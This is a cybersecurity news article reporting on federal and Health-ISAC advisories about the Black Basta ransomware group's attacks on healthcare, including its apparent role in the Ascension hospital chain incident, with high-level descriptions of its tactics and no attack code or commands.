Fraud Management & Cybercrime , Healthcare , Industry Specific

Feds, Groups Warn Health Sector of Black Basta Threats

Advisories Come As Black Basta Appears Responsible for Ascension Ransomware Attack
Feds, Groups Warn Health Sector of Black Basta Threats
Image: CISA

U.S. federal authorities warned that the Russian-speaking ransomware group Black Basta is actively targeting American critical infrastructure amid reports that it's behind the ransomware attack on hospital chain Ascension.

See Also: The 2022 Aftermath of Ransomware on Healthcare

Ascension is still operating under downtime procedures as it recovers from a cyber incident detected Wednesday that forced it to divert ambulances and postpone nonemergency procedures. The St. Louis, Missouri chain of nonprofit, Catholic hospitals is one of the largest in the United States (see: Ascension Diverts Emergency Patients, Postpones Care).

Ascension has not commented on a CNN report Friday that attributed the attack to Black Basta, although it does now acknowledge that the incident was a ransomware attack.

A source familiar with the Ascension investigation confirmed Monday to Information Security Media Group that Black Basta appears to be behind the Ascension attack. The hospital chain did not immediately respond to a request for comment.

A growing body of research and analysis concludes that hospital ransomware attacks increase mortality rates at hospitals. An October 2023 working paper by University of Minnesota academics says the escalation in the post-ransomware attack in-hospital mortality rate for already-admitted patients is most pronounced with Black patients. The authors said that disproportionate effect can be explained with other research showing that Black patients' health suffers more than white patients' health during times of capacity strain.

Federal agencies behind the Friday warning include the Cybersecurity and Infrastructure Security Agency, the FBI, the Department of Health and Human Services and the Multi-State Information Sharing and Analysis Center. The Health Information Sharing and Analysis Center and the American Hospital Association issued their own alerts based on the joint advisory.

The federal advisory warns that hackers have used Black Basta ransomware to encrypt and steal data from at least 12 of the 16 critical infrastructure sectors, including healthcare. As of this month, Black Basta affiliates have affected more than 500 organizations globally across many sectors, the alert says.

Black Basta first emerged in April 2022 as a spinoff from the Conti ransomware group, which fragmented after Russia's February 2022 invasion of Ukraine (see: Conti's Legacy: What's Become of Ransomware's Most Wanted?).

So far this year, researchers know about ransomware attacks against 12 U.S. healthcare systems with 195 hospitals carried out by a variety of cybercriminal groups, said Brett Callow, a threat analyst at security firm Emsisoft. The overall number of known affected hospital systems last year totaled 46. Hackers stole data in a majority of incidents, Emsisoft found.

Black Basta ransom notes do not generally include an initial ransom demand or payment instructions. Rather, the notes provide victims with a unique code and instruct them to contact the ransomware group via a .onion URL, reachable through the Tor browser. The group typically gives victims between 10 and 12 days to pay a demand before it publishes stolen data.

"Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions," the advisory says.

In its alert, the Health-ISAC said it has assessed that Black Basta represents "a significant threat" to the healthcare sector. "Members are strongly advised to keep an eye on the threat actor and their tactics, techniques and procedures. Black Basta's malware, written in C++, targets both Windows and Linux systems. It encrypts data using ChaCha20 and RSA-4096 and attempts to delete shadow copies and backups," Health-ISAC said.

Black Basta affiliates primarily use spear-phishing to obtain initial access. The researchers said that Black Basta affiliates have also used Qakbot during initial access.

For lateral movement, group affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol. Some affiliates also use tools such as Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement.

Researchers at security firm Rapid7 in a blog post published Friday said the company has identified an ongoing social engineering campaign targeting multiple managed detection and response customers that did not involve ransomware encryption yet appears linked to Black Basta.

"We have observed organizations across various verticals to be affected by these social engineering attempts, including manufacturing, transportation, and food and beverage," said Robert Knapp, a senior manager of Rapid7 incident response services. "The threat of ransomware is real to all organizations, in any industry or vertical, of any size," he said.

Black Basta is distinguished by its rapid execution and strategic targeting, which often lead to swift and severe disruptions compared to other ransomware groups, said Emily Phelps, cybersecurity evangelist at security firm Cyware.

"Black Basta frequently exploits vulnerabilities related to remote access systems and outdated software patches. Healthcare entities should prioritize securing these vulnerabilities to mitigate risks," she said.

About the Author

Marianne Kolbasuk McGee

Marianne Kolbasuk McGee

Executive Editor, HealthcareInfoSecurity, ISMG

McGee is executive editor of Information Security Media Group's media site. She has about 30 years of IT journalism experience, with a focus on healthcare information technology issues for more than 15 years. Before joining ISMG in 2012, she was a reporter at InformationWeek magazine and news site and played a lead role in the launch of InformationWeek's healthcare IT media site.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing, you agree to our use of cookies.